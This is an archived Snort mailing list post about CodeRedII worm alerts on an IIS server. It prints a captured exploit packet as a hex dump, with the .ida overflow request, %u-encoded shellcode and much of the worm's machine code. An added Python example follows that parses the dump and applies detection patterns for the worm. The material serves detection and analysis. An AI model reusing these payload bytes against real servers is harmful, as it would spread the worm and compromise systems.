Snort mailing list archives

CodeRedII again?


From: Pontus Joakimsson <jpontus () ess nec de>
Date: Wed, 22 Aug 2001 14:35:52 +0200

Hi,

 Had a warez "attack" on our web/ftp server the last two days (thinking of writing some
 rules for detecting it, can be interesting?), and noticed quite a few Code Red alerts
 in the logs; the thing I reacted to was that it contained the string "CodeRedII"...
 Does anyone know about this variant?

 btw. does anyone know if it's possible to add more than one "detection-string" to a rule?

Regards,
  Pontus Joakimsson

------------------------------------------------------------
[**] WEB-IIS ISAPI .ida attempt [**]
08/22-09:48:13.441655 210.111.15.79:1476 -> x.x.x.x 80
TCP TTL:104 TOS:0x0 ID:13484 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x3F4EE63E  Ack: 0x15A91A99  Win: 0x4470  TcpLen: 20
------------------------------------------------------------
0x0000: 08 00 20 85 EF DF 00 C0 95 E0 F0 9B 08 00 45 00  .. ...........E.
0x0010: 05 DC 34 AC 40 00 68 06 A9 41 D2 6F 0F 4F C1 8D  ..4.@.h..A.o.O..
0x0020: 8B E2 05 C4 00 50 3F 4E E6 3E 15 A9 1A 99 50 10  .....P?N.>....P.
0x0030: 44 70 A3 58 00 00 47 45 54 20 2F 64 65 66 61 75  Dp.X..GET /defau
0x0040: 6C 74 2E 69 64 61 3F 58 58 58 58 58 58 58 58 58  lt.ida?XXXXXXXXX
-- SNIP --
0x0120: 58 58 58 58 58 58 58 25 75 39 30 39 30 25 75 36  XXXXXXX%u9090%u6
0x0130: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25  858%ucbd3%u7801%
0x0140: 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64  u9090%u6858%ucbd
0x0150: 33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 36  3%u7801%u9090%u6
0x0160: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25  858%ucbd3%u7801%
0x0170: 75 39 30 39 30 25 75 39 30 39 30 25 75 38 31 39  u9090%u9090%u819
0x0180: 30 25 75 30 30 63 33 25 75 30 30 30 33 25 75 38  0%u00c3%u0003%u8
0x0190: 62 30 30 25 75 35 33 31 62 25 75 35 33 66 66 25  b00%u531b%u53ff%
0x01A0: 75 30 30 37 38 25 75 30 30 30 30 25 75 30 30 3D  u0078%u0000%u00=
0x01B0: 61 20 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E  a  HTTP/1.0..Con
0x01C0: 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 74 2F  tent-type: text/
0x01D0: 78 6D 6C 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67  xml.Content-leng
0x01E0: 74 68 3A 20 33 33 37 39 20 0D 0A 0D 0A C8 C8 01  th: 3379 .......
0x01F0: 00 60 E8 03 00 00 00 CC EB FE 64 67 FF 36 00 00  .`........dg.6..
0x0200: 64 67 89 26 00 00 E8 DF 02 00 00 68 04 01 00 00  dg.&.......h....
0x0210: 8D 85 5C FE FF FF 50 FF 55 9C 8D 85 5C FE FF FF  ..\...P.U...\...
0x0220: 50 FF 55 98 8B 40 10 8B 08 89 8D 58 FE FF FF FF  P.U..@.....X....
0x0230: 55 E4 3D 04 04 00 00 0F 94 C1 3D 04 08 00 00 0F  U.=.......=.....
0x0240: 94 C5 0A CD 0F B6 C9 89 8D 54 FE FF FF 8B 75 08  .........T....u.
0x0250: 81 7E 30 9A 02 00 00 0F 84 C4 00 00 00 C7 46 30  .~0...........F0
0x0260: 9A 02 00 00 E8 0A 00 00 00 43 6F 64 65 52 65 64  .........CodeRed
0x0270: 49 49 00 8B 1C 24 FF 55 D8 66 0B C0 0F 95 85 38  II...$.U.f.....8
0x0280: FE FF FF C7 85 50 FE FF FF 01 00 00 00 6A 00 8D  .....P.......j..
0x0290: 85 50 FE FF FF 50 8D 85 38 FE FF FF 50 8B 45 08  .P...P..8...P.E.
0x02A0: FF 70 08 FF 90 84 00 00 00 80 BD 38 FE FF FF 01  .p.........8....
0x02B0: 74 68 53 FF 55 D4 FF 55 EC 01 45 84 69 BD 54 FE  thS.U..U..E.i.T.
0x02C0: FF FF 2C 01 00 00 81 C7 2C 01 00 00 E8 D2 04 00  ..,.....,.......
0x02D0: 00 F7 D0 0F AF C7 89 46 34 8D 45 88 50 6A 00 FF  .......F4.E.Pj..
0x02E0: 75 08 E8 05 00 00 00 E9 01 FF FF FF 6A 00 6A 00  u...........j.j.
0x02F0: FF 55 F0 50 FF 55 D0 4F 75 D2 E8 3B 05 00 00 69  .U.P.U.Ou..;...i
0x0300: BD 54 FE FF FF 00 5C 26 05 81 C7 00 5C 26 05 57  .T....\&....\&.W
0x0310: FF 55 E8 6A 00 6A 16 FF 55 8C 6A FF FF 55 E8 EB  .U.j.j..U.j..U..
0x0320: F9 8B 46 34 29 45 84 6A 64 FF 55 E8 8D 85 3C FE  ..F4)E.jd.U...<.
0x0330: FF FF 50 FF 55 C0 0F B7 85 3C FE FF FF 3D D2 07  ..P.U....<...=..
0x0340: 00 00 73 CF 0F B7 85 3E FE FF FF 83 F8 0A 73 C3  ..s....>......s.
0x0350: 66 C7 85 70 FF FF FF 02 00 66 C7 85 72 FF FF FF  f..p.....f..r...
0x0360: 00 50 E8 64 04 00 00 89 9D 74 FF FF FF 6A 00 6A  .P.d.....t...j.j
0x0370: 01 6A 02 FF 55 B8 83 F8 FF 74 F2 89 45 80 6A 01  .j..U....t..E.j.
0x0380: 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 6A 10 8D  Th~f...u..U.Yj..
0x0390: 85 70 FF FF FF 50 FF 75 80 FF 55 B0 BB 01 00 00  .p...P.u..U.....
0x03A0: 00 0B C0 74 4B 33 DB FF 55 94 3D 33 27 00 00 75  ...tK3..U.=3'..u
0x03B0: 3F C7 85 68 FF FF FF 0A 00 00 00 C7 85 6C FF FF  ?..h.........l..
0x03C0: FF 00 00 00 00 C7 85 60 FF FF FF 01 00 00 00 8B  .......`........
0x03D0: 45 80 89 85 64 FF FF FF 8D 85 68 FF FF FF 50 6A  E...d.....h...Pj
0x03E0: 00 8D 85 60 FF FF FF 50 6A 00 6A 01 FF 55 A0 93  ...`...Pj.j..U..
0x03F0: 6A 00 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 83  j.Th~f...u..U.Y.
0x0400: FB 01 75 31 E8 00 00 00 00 58 2D D3 03 00 00 6A  ..u1.....X-....j
0x0410: 00 68 EA 0E 00 00 50 FF 75 80 FF 55 AC 3D EA 0E  .h....P.u..U.=..
0x0420: 00 00 75 11 6A 00 6A 01 8D 85 5C FE FF FF 50 FF  ..u.j.j...\...P.
0x0430: 75 80 FF 55 A8 FF 75 80 FF 55 B4 E9 E7 FE FF FF  u..U..u..U......
0x0440: BB 00 00 DF 77 81 C3 00 00 01 00 81 FB 00 00 00  ....w...........
0x0450: 78 75 05 BB 00 00 F0 BF 60 E8 0E 00 00 00 8B 64  xu......`......d
0x0460: 24 08 64 67 8F 06 00 00 58 61 EB D9 64 67 FF 36  $.dg....Xa..dg.6
0x0470: 00 00 64 67 89 26 00 00 66 81 3B 4D 5A 75 E3 8B  ..dg.&..f.;MZu..
0x0480: 4B 3C 81 3C 0B 50 45 00 00 75 D7 8B 54 0B 78 03  K<.<.PE..u..T.x.
0x0490: D3 8B 42 0C 81 3C 03 4B 45 52 4E 75 C5 81 7C 03  ..B..<.KERNu..|.
0x04A0: 04 45 4C 33 32 75 BB 33 C9 49 8B 72 20 03 F3 FC  .EL32u.3.I.r ...
0x04B0: 41 AD 81 3C 03 47 65 74 50 75 F5 81 7C 03 04 72  A..<.GetPu..|..r
0x04C0: 6F 63 41 75 EB 03 4A 10 49 D1 E1 03 4A 24 0F B7  ocAu..J.I...J$..
0x04D0: 0C 0B C1 E1 02 03 4A 1C 8B 04 0B 03 C3 89 44 24  ......J.......D$
0x04E0: 24 64 67 8F 06 00 00 58 61 C3 E8 51 FF FF FF 89  $dg....Xa..Q....
0x04F0: 5D FC 89 45 F8 E8 0D 00 00 00 4C 6F 61 64 4C 69  ]..E......LoadLi
0x0500: 62 72 61 72 79 41 00 FF 75 FC FF 55 F8 89 45 F4  braryA..u..U..E.
0x0510: E8 0D 00 00 00 43 72 65 61 74 65 54 68 72 65 61  .....CreateThrea
0x0520: 64 00 FF 75 FC FF 55 F8 89 45 F0 E8 0D 00 00 00  d..u..U..E......
0x0530: 47 65 74 54 69 63 6B 43 6F 75 6E 74 00 FF 75 FC  GetTickCount..u.
0x0540: FF 55 F8 89 45 EC E8 06 00 00 00 53 6C 65 65 70  .U..E......Sleep
0x0550: 00 FF 75 FC FF 55 F8 89 45 E8 E8 17 00 00 00 47  ..u..U..E......G
0x0560: 65 74 53 79 73 74 65 6D 44 65 66 61 75 6C 74 4C  etSystemDefaultL
0x0570: 61 6E 67 49 44 00 FF 75 FC FF 55 F8 89 45 E4 E8  angID..u..U..E..
0x0580: 14 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72  ....GetSystemDir
0x0590: 65 63 74 6F 72 79 41 00 FF 75 FC FF 55 F8 89 45  ectoryA..u..U..E
0x05A0: E0 E8 0A 00 00 00 43 6F 70 79 46 69 6C 65 41 00  ......CopyFileA.
0x05B0: FF 75 FC FF 55 F8 89 45 DC E8 10 00 00 00 47 6C  .u..U..E......Gl
0x05C0: 6F 62 61 6C 46 69 6E 64 41 74 6F 6D 41 00 FF 75  obalFindAtomA..u
0x05D0: FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C 6F 62  ..U..E......Glob
0x05E0: 61 6C 41 64 64 41 74 6F 6D 41                    alAddAtomA

--------------------------------------------------------

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
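As an added example (not from the post, and not Snort code), a small Python parser for the hex-dump format Snort printed above, used to test the decoded payload for the traits visible in the dump: the overlong `/default.ida?XXX...` request, the run of `%uXXXX` escapes, and the NUL-terminated "CodeRedII" string the poster noticed. The sample rows are copied from the dump; the regex patterns and the labels returned by `classify` are my own.

```python
import re

# Rows copied from the Snort hex dump in the post above; the gaps between
# offsets are where the post was snipped.
SAMPLE_DUMP = """\
0x0030: 44 70 A3 58 00 00 47 45 54 20 2F 64 65 66 61 75  Dp.X..GET /defau
0x0040: 6C 74 2E 69 64 61 3F 58 58 58 58 58 58 58 58 58  lt.ida?XXXXXXXXX
0x0120: 58 58 58 58 58 58 58 25 75 39 30 39 30 25 75 36  XXXXXXX%u9090%u6
0x0130: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25  858%ucbd3%u7801%
0x0260: 9A 02 00 00 E8 0A 00 00 00 43 6F 64 65 52 65 64  .........CodeRed
0x0270: 49 49 00 8B 1C 24 FF 55 D8 66 0B C0 0F 95 85 38  II...$.U.f.....8
"""

# "0xOFFSET:" then space-separated hex pairs; the ASCII column is set off
# by two spaces, so the pair pattern stops before it.
DUMP_ROW = re.compile(r"^0x([0-9A-Fa-f]{4}):((?:\s[0-9A-Fa-f]{2})+)")

# Indicators (my own patterns, derived from the dump): the overlong .ida
# request, a run of %uXXXX escapes, and the NUL-terminated marker string.
IDA_REQUEST = re.compile(rb"GET /default\.ida\?X{3,}")
UNICODE_ESCAPES = re.compile(rb"(?:%u[0-9A-Fa-f]{4}){4,}")
CODERED2_MARKER = b"CodeRedII\x00"

def parse_snort_dump(text: str) -> bytes:
    """Decode Snort hex-dump rows to raw bytes. Snipped rows are simply
    skipped, so offsets in the result are not the wire offsets."""
    out = bytearray()
    for line in text.splitlines():
        m = DUMP_ROW.match(line.lstrip())
        if m:
            out += bytes.fromhex(m.group(2))
    return bytes(out)

def code_red_indicators(payload: bytes) -> dict:
    """Report which of the three traits appear in the payload."""
    return {
        "ida_overflow": IDA_REQUEST.search(payload) is not None,
        "unicode_escapes": UNICODE_ESCAPES.search(payload) is not None,
        "codered2_marker": CODERED2_MARKER in payload,
    }

def classify(dump_text: str) -> str:
    """Label a dump: the .ida overflow plus the marker is tagged CodeRedII,
    the overflow or escape run without it as a generic .ida attempt."""
    hits = code_red_indicators(parse_snort_dump(dump_text))
    if hits["ida_overflow"] and hits["codered2_marker"]:
        return "CodeRedII"
    if hits["ida_overflow"] or hits["unicode_escapes"]:
        return "ida-attempt"
    return "clean"
```

Checking the three indicators together is the same combination the post asks to express in one rule; a plain `.ida` alert without the marker comes back as "ida-attempt".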